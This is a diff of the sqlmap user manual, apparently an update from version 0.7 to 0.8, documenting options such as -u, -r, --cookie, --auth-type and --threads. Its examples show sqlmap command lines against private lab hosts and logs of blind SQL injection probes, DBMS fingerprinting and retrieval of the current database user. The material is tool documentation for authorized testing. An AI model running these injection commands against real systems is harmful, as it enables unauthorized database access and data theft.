+[hh:mm:47] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 192.168.1.121:80
+Host: 172.16.213.131
 Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
+Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+User-agent: sqlmap/0.8
 Connection: close
 
-[hh:mm:17] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Thu, 11 Dec 2008 hh:mm:17 GMT
-Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch
-X-Powered-By: PHP/5.2.6-2ubuntu4
-Content-Length: 119
+[hh:mm:47] [TRAFFIC IN] HTTP response (OK - 200):
+Date: Sat, 20 Feb 2010 17:44:27 GMT
+Server: Apache/2.2.9
+X-Powered-By: PHP/5.2.6-1+lenny4
+Vary: Accept-Encoding
 Connection: close
+Transfer-Encoding: chunked
 Content-Type: text/html
 
 <html><body>
@@ -781,33 +927,6 @@ Content-Type: text/html
 </table>
 </body></html>
 [...]
-[hh:mm:18] [INFO] testing MySQL
-[hh:mm:18] [INFO] query: CONCAT(CHAR(51), CHAR(51))
-[hh:mm:18] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2851%29%2C%20CHAR
-%2851%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%202581=2581 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 192.168.1.121:80
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
-Connection: close
-
-[hh:mm:18] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Thu, 11 Dec 2008 hh:mm:18 GMT
-Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch
-X-Powered-By: PHP/5.2.6-2ubuntu4
-Content-Length: 75
-Connection: close
-Content-Type: text/html
-
-<html><body>
-<b>SQL results:</b>
-<table border="1">
-</table>
-</body></html>
-[...]
 
    
 
    
 
    
@@ -817,35 +936,34 @@ Content-Type: text/html
 
 
 
    At least one of these options has to be specified to set the source to get
-target urls from.
    
+target addresses from.
    
 
 
    Target URL
    
 
-
    Option: -u or --url
    
+
    Option: -u or --url
    
 
-
    To run sqlmap on a single target URL.
    
+
    To run sqlmap against a single target URL.
    
 
 
    Example on a MySQL 5.0.67 target:
    
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1"
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1"
 
 [...]
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
 web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: MySQL >= 5.0.0
+back-end DBMS: MySQL 5
 
    
 
    
 
    
 
 
-
    Parse targets from Burp or WebScarab logs
    
+
    Parse targets from Burp or WebScarab proxy logs
    
 
 
    Option: -l
    
 
-
    Rather than providing a single target URL it is possible to test and inject
-on HTTP requests proxied through 
+
    Rather than providing a single target URL, it is possible to test and
+inject on HTTP requests proxied through 
 Burp proxy
 or 
 WebScarab proxy.
    
@@ -859,7 +977,7 @@ $ python sqlmap.py -l /tmp/webscarab.log/conversations/
 [hh:mm:43] [INFO] sqlmap parsed 27 testable requests from the targets list
 [hh:mm:43] [INFO] sqlmap got a total of 27 targets
 [hh:mm:43] [INPUT] url 1:
-GET http://192.168.1.121:80/phpmyadmin/navigation.php?db=test&token=60747016432606019619a
+GET http://172.16.213.131/phpmyadmin/navigation.php?db=test&token=60747016432606019619a
 c58b3780562
 Cookie: PPA_ID=197bf44d671aeb7d3a28719a467d86c3; phpMyAdmin=366c9c9b329a98eabb4b708c2df8b
 d7d392eb151; pmaCookieVer=4; pmaPass-1=uH9%2Fz5%2FsB%2FM%3D; pmaUser-1=pInZx5iWPrA%3D; 
@@ -867,10 +985,10 @@ pma_charset=iso-8859-1; pma_collation_connection=utf8_unicode_ci; pma_fontsize=d
 pma_lang=en-utf-8; pma_mcrypt_iv=o6Mwtqw6c0c%3D; pma_theme=deleted
 do you want to test this url? [Y/n/q] n
 [hh:mm:46] [INPUT] url 2:
-GET http://192.168.1.121:80/sqlmap/mysql/get_int.php?id=1
+GET http://172.16.213.131/sqlmap/mysql/get_int.php?id=1
 Cookie: PPA_ID=197bf44d671aeb7d3a28719a467d86c3
 do you want to test this url? [Y/n/q] y
-[hh:mm:49] [INFO] testing url http://192.168.1.121:80/sqlmap/mysql/get_int.php?id=1
+[hh:mm:49] [INFO] testing url http://172.16.213.131/sqlmap/mysql/get_int.php?id=1
 [hh:mm:49] [INFO] testing connection to the target url
 [hh:mm:49] [INFO] testing if the url is stable, wait a few seconds
 [hh:mm:50] [INFO] url is stable
@@ -889,16 +1007,10 @@ do you want to test this url? [Y/n/q] y
 [hh:mm:29] [INFO] testing for parenthesis on injectable parameter
 [hh:mm:29] [INFO] the injectable parameter requires 0 parenthesis
 [hh:mm:29] [INFO] testing MySQL
-[hh:mm:29] [INFO] query: CONCAT(CHAR(57), CHAR(57))
 [hh:mm:29] [INFO] retrieved: 99
-[hh:mm:29] [INFO] performed 20 queries in 0 seconds
 [hh:mm:29] [INFO] confirming MySQL
-[hh:mm:29] [INFO] query: LENGTH(CHAR(57))
 [hh:mm:29] [INFO] retrieved: 1
-[hh:mm:29] [INFO] performed 13 queries in 0 seconds
-[hh:mm:29] [INFO] query: SELECT 9 FROM information_schema.TABLES LIMIT 0, 1
 [hh:mm:29] [INFO] retrieved: 9
-[hh:mm:29] [INFO] performed 13 queries in 0 seconds
 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
 web application technology: PHP 5.2.6, Apache 2.2.9
 back-end DBMS: MySQL >= 5.0.0
@@ -908,7 +1020,60 @@ back-end DBMS: MySQL >= 5.0.0
 
    
 
 
-
    Process Google dork results as target urls
    
+
    Load HTTP request from a file
    
+
+
    Option: -r
    
+
+
    One of the possibilities of sqlmap is loading of complete HTTP
+request packet stored in textual file. That way you can skip usage of
+bunch of other options.
    
+
+
    Sample content of a HTTP request file:
    
+
    
+
    
+
    +POST /sqlmap/mysql/post_int.php HTTP/1.1
+Host: 172.16.213.131
+User-Agent: Mozilla/4.0
+
+id=1
+
    
+
    
+
    
+
+
    Example usage:
    
+
    
+
    
+
    +$ python sqlmap.py -r request.txt
+
+[...]
+[hh:mm:27] [INFO] parsing HTTP request from 'request.txt'
+[...]
+[hh:mm:21] [INFO] testing if POST parameter 'id' is dynamic
+[hh:mm:22] [INFO] confirming that POST parameter 'id' is dynamic
+[hh:mm:22] [INFO] POST parameter 'id' is dynamic
+[hh:mm:22] [INFO] testing sql injection on POST parameter 'id' with 0 parenthesis
+[hh:mm:22] [INFO] testing unescaped numeric injection on POST parameter 'id'
+[hh:mm:22] [INFO] confirming unescaped numeric injection on POST parameter 'id'
+[hh:mm:22] [INFO] POST parameter 'id' is unescaped numeric injectable with 0 parenthesis
+[hh:mm:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
+[hh:mm:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
+[hh:mm:22] [INFO] testing for parenthesis on injectable parameter
+[hh:mm:22] [INFO] the injectable parameter requires 0 parenthesis
+[hh:mm:22] [INFO] testing MySQL
+[hh:mm:22] [INFO] confirming MySQL
+[hh:mm:22] [INFO] retrieved: 3
+[hh:mm:22] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
+web application technology: PHP 5.2.4, Apache 2.2.8
+back-end DBMS: MySQL >= 5.0.0
+
    
+
    
+
    
+
+
+
    Process Google dork results as target addresses
    
 
 
    Option: -g
    
 
@@ -963,7 +1128,7 @@ want to test this url? [y/N/q] y
 
    It is possible to pass user's options from a configuration INI file, an
 example is sqlmap.conf.
    
 
-
    Example on a MySQL 5.0.67 target:
    
+
    Example usage:
    
 
    
 
    
 
    @@ -984,11 +1149,12 @@ the provided configuration file.
    
 
    5.3 Request
 
    
 
-
    These options can be used to specify how to connect to the target url.
    
+
    These options can be used to specify how to connect to the target
+application.
    
 
 
    HTTP method: GET or POST
    
 
-
    Options: --method and --data
    
+
    Options: --method and --data
    
 
 
    By default the HTTP method used to perform HTTP requests is GET,
 but you can change it to POST and provide the data to be sent
@@ -999,7 +1165,7 @@ tested for SQL injection like the GET parameters.
    
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/post_int.php" --method POST \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/post_int.php" --method POST \
   --data "id=1"
 
 [hh:mm:53] [INFO] testing connection to the target url
@@ -1014,13 +1180,9 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/post_int.php" --method
 [hh:mm:54] [INFO] POST parameter 'id' is numeric/unescaped injectable
 [...]
 [hh:mm:54] [INFO] testing Oracle
-[hh:mm:54] [INFO] query: LENGTH(SYSDATE)
 [hh:mm:54] [INFO] retrieved: 9
-[hh:mm:54] [INFO] performed 13 queries in 0 seconds
 [hh:mm:54] [INFO] confirming Oracle
-[hh:mm:54] [INFO] query: SELECT VERSION FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1
 [hh:mm:54] [INFO] retrieved: 10.2.0.1.0
-[hh:mm:55] [INFO] performed 76 queries in 0 seconds
 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
 web application technology: PHP 5.2.6, Apache 2.2.9
 back-end DBMS:    Oracle
@@ -1031,7 +1193,7 @@ back-end DBMS:    Oracle
 
 
    HTTP Cookie header
    
 
-
    Option: --cookie
    
+
    Options: --cookie, --cookie-urlencode and --drop-set-cookie
    
 
 
    This feature can be useful in two scenarios:
    
 
    
@@ -1061,7 +1223,7 @@ value to the clipboard.
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/cookie_int.php" --cookie \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/cookie_int.php" --cookie \
   "id=1" -v 1
 
 [hh:mm:37] [INFO] testing connection to the target url
@@ -1079,30 +1241,31 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/cookie_int.php" --cooki
 
    
 
    
 
-
    Note that the HTTP Cookie header values are separated by a
-; character, not by an &.
    
+
    Note that the HTTP Cookie header values are usually separated by
+a ; character, not by an &.
    
 
-
    If the web application at first HTTP response has within the HTTP headers
-a Set-Cookie header, sqlmap will automatically use it in all HTTP
-requests as the HTTP Cookie header and also test for SQL
-injection on these values.
    
+
    If the web application at first HTTP response has a Set-Cookie
+header, sqlmap will automatically use it's value in all further HTTP
+requests as the Cookie header. sqlmap will also automatically
+test that value for SQL injection, except if you run it with
+--drop-set-cookie option.
    
 
 
    Example on a Microsoft SQL Server 2000 Service Pack 0 target:
    
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.125/sqlmap/get_str.asp?name=luther" -v 3
+$ python sqlmap.py -u "http://172.16.213.128/sqlmap/get_str.asp?name=luther" -v 3
 
 [...]
 [hh:mm:39] [INFO] testing connection to the target url
 [hh:mm:39] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/get_str.asp?name=luther HTTP/1.1
 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 192.168.1.125:80
+Host: 172.16.213.128:80
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
 Cookie: ASPSESSIONIDSABTRCAS=HPCBGONANJBGFJFHGOKDMCGJ
 Connection: close
 
@@ -1113,12 +1276,12 @@ Connection: close
 [hh:mm:40] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/get_str.asp?name=luther HTTP/1.1
 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 192.168.1.125:80
+Host: 172.16.213.128:80
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
 Cookie: ASPSESSIONIDSABTRCAS=469
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:40] [WARNING] Cookie parameter 'ASPSESSIONIDSABTRCAS' is not dynamic
@@ -1135,7 +1298,7 @@ in the following HTTP requests.
    
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.125/sqlmap/get_str.asp?name=luther" --cookie "id=1"
+$ python sqlmap.py -u "http://172.16.213.128/sqlmap/get_str.asp?name=luther" --cookie "id=1"
 
 [hh:mm:51] [INPUT] you provided an HTTP Cookie header value. The target url provided its
 own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP cookie
@@ -1144,61 +1307,32 @@ values that you provided? [Y/n]
 
    
 
    
 
-
-
    HTTP Referer header
    
-
-
    Option: --referer
    
-
-
    It is possible to fake the HTTP Referer header value with this
-option. By default no HTTP Referer heder is sent in HTTP
-requests.
    
-
-
    Example on a PostgreSQL 8.3.5 target:
    
-
    
-
    
-
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --referer \
-  "http://www.google.com" -v 3
-
-[...]
-[hh:mm:48] [INFO] testing connection to the target url
-[hh:mm:48] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 192.168.1.121:80
-Accept-language: en-us,en;q=0.5
-Referer: http://www.google.com
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
-Connection: close
-[...]
-
    
-
    
-
    
+
    sqlmap by default doesn't URL encode generated cookie injections, but you can force it by 
+using the --cookie-urlencode flag. Cookie content encoding is not declared
+by standard in any way, so it's solely the matter of web application's behaviour.
    
 
 
 
    HTTP User-Agent header
    
 
-
    Options: --user-agent and -a
    
+
    Options: --user-agent and -a
    
 
 
    By default sqlmap perform HTTP requests providing the following HTTP
 User-Agent header value:
    
 
    
 
    
 
    -sqlmap/0.7 (http://sqlmap.sourceforge.net)
+sqlmap/0.8 (http://sqlmap.sourceforge.net)
 
    
 
    
 
    
 
-
    It is possible to fake it with the --user-agent option.
    
+
    It is possible to fake it with the --user-agent option.
    
 
 
    Example on an Oracle XE 10.2.0.1 target:
    
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" \
   --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3
 
 [...]
@@ -1206,7 +1340,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" \
 [hh:mm:02] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 192.168.1.121:80
+Host: 172.16.213.131
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
@@ -1226,7 +1360,7 @@ and use it for all HTTP requests.
    
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1 \
   -a "./txt/user-agents.txt"
 
 [hh:mm:00] [DEBUG] initializing the configuration
@@ -1242,7 +1376,7 @@ Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)
 [hh:mm:00] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 192.168.1.121:80
+Host: 172.16.213.131
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
@@ -1272,31 +1406,64 @@ to force the HTTP User-Agent header with option --user-agent or -a
 
    
 
 
+
    HTTP Referer header
    
+
+
    Option: --referer
    
+
+
    It is possible to fake the HTTP Referer header value with this
+option. By default no HTTP Referer header is sent in HTTP
+requests.
    
+
+
    Example on a PostgreSQL 8.3.5 target:
    
+
    
+
    
+
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --referer \
+  "http://www.google.com" -v 3
+
+[...]
+[hh:mm:48] [INFO] testing connection to the target url
+[hh:mm:48] [TRAFFIC OUT] HTTP request:
+GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
+Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
+Host: 172.16.213.131
+Accept-language: en-us,en;q=0.5
+Referer: http://www.google.com
+Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
+image/png,*/*;q=0.5
+User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
+Connection: close
+[...]
+
    
+
    
+
    
+
+
 
    Extra HTTP headers
    
 
-
    Option: --headers
    
+
    Option: --headers
    
 
-
    It is possible to provide extra HTTP headers by providing --headers
-options. Each header must be separated by a "\n" string and it's much easier
+
    It is possible to provide extra HTTP headers by providing --headers
+options. Each header must be separated by a newline and it's much easier
 to provide them from the configuration INI file. Have a look at the sample
 sqlmap.conf file.
    
 
 
-
    HTTP Basic and Digest authentications
    
+
    HTTP Basic, Digest and NTLM authentications
    
 
-
    Options: --auth-type and --auth-cred
    
+
    Options: --auth-type and --auth-cred
    
 
 
    These options can be used to specify which HTTP authentication type the
 web server implements and the valid credentials to be used to perfom all
-HTTP requests to the target URL.
-The two valid types are Basic and Digest and the
-credentials' syntax is username:password.
    
+HTTP requests to the target application.
+The three valid types are Basic, Digest and NTLM,
+while the credentials' syntax is username:password.
    
 
 
    Examples on a MySQL 5.0.67 target:
    
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/basic/get_int.php?id=1" \
   --auth-type Basic --auth-cred "testuser:testpass" -v 3
 
 [...]
@@ -1304,17 +1471,17 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1"
 [hh:mm:14] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/basic/get_int.php?id=1 HTTP/1.1
 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 192.168.1.121:80
+Host: 172.16.213.131
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
 Authorization: Basic dGVzdHVzZXI6dGVzdHBhc3M=
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
 Connection: close
 [...]
 
 
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/digest/get_int.php?id=1" \
   --auth-type Digest --auth-cred "testuser:testpass" -v 3
 
 [...]
@@ -1322,7 +1489,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1
 [hh:mm:54] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/digest/get_int.php?id=1 HTTP/1.1
 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 192.168.1.121:80
+Host: 172.16.213.131
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
@@ -1330,7 +1497,7 @@ Authorization: Digest username="testuser", realm="Testing digest authentication"
 nonce="Qw52C8RdBAA=2d7eb362292b24718dcb6e4d9a7bf0f13d58fa9d", 
 uri="/sqlmap/mysql/digest/get_int.php?id=1", response="16d01b08ff2f77d8ff0183d706f96747", 
 algorithm="MD5", qop=auth, nc=00000001, cnonce="579be5eb8753693a"
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
 Connection: close
 [...]
 
    
@@ -1338,9 +1505,30 @@ Connection: close
 
    
 
 
+
    HTTP Certificate authentication
    
+
+
    Option: --auth-cert
    
+
    This option should be used in cases when the web server requires proper user's 
+certificate for authentication. Supplied values should be in the form: key_file,
+cert_file, where key_file should be the name of a PEM formatted file that 
+contains your private key, while cert_file should be the name for a PEM formatted 
+certificate chain file.
    
+
+
    Example:
    
+
    
+
    
+
    +$ python sqlmap.py -u "http://www.example.com/process.php?id=1" \
+  --auth-cert key.pem,cert.pem
+[...]
+
    
+
    
+
    
+
+
 
    HTTP proxy
    
 
-
    Option: --proxy
    
+
    Option: --proxy and --ignore-proxy
    
 
 
    It is possible to provide an anonymous HTTP proxy address to pass by the
 HTTP requests to the target URL. The syntax of HTTP proxy value is
@@ -1350,8 +1538,8 @@ HTTP requests to the target URL. The syntax of HTTP proxy value is
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
-  --proxy "http://192.168.1.47:3128"
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" \
+  --proxy "http://172.16.213.1:8080"
 
 [hh:mm:36] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
 [hh:mm:36] [WARNING] GET parameter 'cat' is not dynamic
@@ -1372,8 +1560,8 @@ as explained on the
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
-  --proxy "http://192.168.1.47:8118"
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" \
+  --proxy "http://172.16.213.1:8118"
 
    
 
    
 
    
@@ -1381,10 +1569,14 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
 
    Note that 8118 is the default Privoxy port, adapt it to your
 settings.
    
 
+
    The option --ignore-proxy should be used in cases like
+when you want to run sqlmap against the machine inside a local area
+network skipping default usage of a system-wide set HTTP proxy server.
    
+
 
 
    Concurrent HTTP requests
    
 
-
    Option: --threads
    
+
    Option: --threads
    
 
 
    It is possible to specify the number of maximum concurrent HTTP requests
 that sqlmap can start when it uses the blind SQL injection technique to
@@ -1396,7 +1588,7 @@ This feature relies on the
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1 \
   --current-user --threads 3
 
 [...]
@@ -1406,12 +1598,9 @@ back-end DBMS: MySQL >= 5.0.0
 
 [hh:mm:18] [INFO] fetching current user
 [hh:mm:18] [INFO] retrieving the length of query output
-[hh:mm:18] [INFO] query: IFNULL(CAST(LENGTH(CURRENT_USER()) AS CHAR(10000)), CHAR(32))
 [hh:mm:18] [INFO] retrieved: 18
-[hh:mm:19] [INFO] query: IFNULL(CAST(CURRENT_USER() AS CHAR(10000)), CHAR(32))
 [hh:mm:19] [INFO] starting 3 threads
 [hh:mm:19] [INFO] retrieved: testuser@localhost
-[hh:mm:19] [INFO] performed 126 queries in 0 seconds
 current user:    'testuser@localhost'
 
    
 
    
@@ -1424,13 +1613,13 @@ HTTP requests, the maximum requests to retrieve a query output character
 with the blind SQL injection bisection algorithm implemented in sqlmap.
    
 
 
    Note that the multithreading option is not needed if the target is affected
-by an inband SQL injection vulnerability and the --union-use
+by an inband SQL injection vulnerability and the --union-use
 option has been provided.
    
 
 
 
    Delay in seconds between each HTTP request
    
 
-
    Option: --delay
    
+
    Option: --delay
    
 
 
    It is possible to specify a number of seconds to wait between each HTTP
 request. The valid value is a float, for instance 0.5 means half a second.
    
@@ -1438,7 +1627,7 @@ request. The valid value is a float, for instance 0.5 means half a second.
    
 
 
    Seconds to wait before timeout connection
    
 
-
    Option: --timeout
    
+
    Option: --timeout
    
 
 
    It is possible to specify a number of seconds to wait before considering
 the HTTP request timed out. The valid value is a float, for instance
@@ -1447,12 +1636,29 @@ the HTTP request timed out. The valid value is a float, for instance
 
 
    Maximum number of retries when the HTTP connection timeouts
    
 
-
    Option: --retries
    
+
    Option: --retries
    
 
 
    It is possible to specify the maximum number of retries when the HTTP
 connection timeouts. By default it retries up to three times.
    
 
 
+
    Filtering targets from provided proxy log using regular expression
    
+
+
    Option: --scope
    
+
+
    Rather than using all hosts parsed from provided logs with option 
+-l, in combination with this option you can specify valid 
+python regular expression to be used for filtering desired ones.
    
+
    Example usage:
    
+
    
+
    
+
    +$ python sqlmap.py -l /tmp/webscarab.log/conversations/ --scope="(www)?\.target\.(com|net|org)"
+
    
+
    
+
    
+
+
 
    5.4 Injection
 
    
 
@@ -1460,6 +1666,7 @@ connection timeouts. By default it retries up to three times.
    
 custom injection payloads and how to parse and compare HTTP responses page
 content when using the blind SQL injection technique.
    
 
+
 
    Testable parameter(s)
    
 
 
    Option: -p
    
@@ -1474,7 +1681,7 @@ injection test and inject directly only against the provided parameter(s).
    
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1 \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -v 1 \
   -p "id"
 
 [hh:mm:48] [INFO] testing connection to the target url
@@ -1498,7 +1705,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 \
   -p "cat,id"
 
    
 
    
@@ -1510,8 +1717,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&ca
 
    
 
    
 
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \
-  -p "user-agent" --user-agent "sqlmap/0.7 (http://sqlmap.sourceforge.net)"
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/ua_str.php" -v 1 \
+  -p "user-agent" --user-agent "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
 
 [hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
 [hh:mm:40] [INFO] testing connection to the target url
@@ -1529,16 +1736,10 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \
 [hh:mm:41] [INFO] testing for parenthesis on injectable parameter
 [hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
 [hh:mm:41] [INFO] testing MySQL
-[hh:mm:41] [INFO] query: CONCAT(CHAR(52), CHAR(52))
 [hh:mm:41] [INFO] retrieved: 44
-[hh:mm:41] [INFO] performed 20 queries in 0 seconds
 [hh:mm:41] [INFO] confirming MySQL
-[hh:mm:41] [INFO] query: LENGTH(CHAR(52))
 [hh:mm:41] [INFO] retrieved: 1
-[hh:mm:41] [INFO] performed 13 queries in 0 seconds
-[hh:mm:41] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
 [hh:mm:41] [INFO] retrieved: 4
-[hh:mm:41] [INFO] performed 13 queries in 0 seconds
 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
 web application technology: PHP 5.2.6, Apache 2.2.9
 back-end DBMS: MySQL >= 5.0.0
@@ -1549,11 +1750,11 @@ back-end DBMS: MySQL >= 5.0.0
 
 
    Force the database management system name
    
 
-
    Option: --dbms
    
+
    Option: --dbms
    
 
 
    By default sqlmap automatically detects the web application's back-end
-database manangement system.
-At the moment the fully supported database management system are four:
    
+database management system.
+At the moment, fully supported database management systems are:
    
 
    
 
      
 
    • MySQL
      • 
@@ -1566,15 +1767,15 @@ At the moment the fully supported database management system are four:
      
 
      It is possible to force the DBMS name if you already know it so that sqlmap
 will skip the fingerprint with an exception for MySQL and Microsoft SQL
 Server to only identify the version.
-To avoid also this check you can provide instead MySQL VERSION or
-Microsoft SQL Server VERSION where version is a valid version for
-the DBMS, for instance 5.0 for MySQL and 2005 for
+To avoid also this check you can provide instead MySQL <version> or
+Microsoft SQL Server <version>, where <version> is a valid version for
+the DBMS; for instance 5.0 for MySQL and 2005 for
 Microsoft SQL Server.
      
 
      Example on a PostgreSQL 8.3.5 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 2 \
